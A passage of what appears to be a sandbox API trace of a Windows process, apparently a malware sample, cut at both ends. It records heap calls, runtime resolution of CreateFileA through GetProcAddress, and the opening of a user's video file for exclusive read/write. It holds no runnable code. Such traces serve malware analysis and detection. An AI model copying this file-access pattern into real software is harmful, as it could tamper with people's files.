dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0199.664] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.664] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0199.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0199.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0199.664] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0199.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0199.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0199.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0199.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0199.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0199.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0199.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0199.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0199.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0199.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0199.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0199.665] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0199.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0199.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0199.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0199.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0199.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0199.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0199.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0199.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0199.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0199.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0199.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0199.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0199.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0199.667] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0199.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.670] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0199.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd408 [0199.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd408, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0199.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.670] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0199.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0199.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd408 [0199.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd408, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0199.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.671] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0199.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0199.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0199.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0199.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0199.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0199.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3f) returned 0x8db138 [0199.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv", cchWideChar=63, lpMultiByteStr=0x8db138, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv", lpUsedDefaultChar=0x0) returned 63 [0199.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0199.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.672] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\syi8lj9.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0199.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0199.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0199.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0199.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 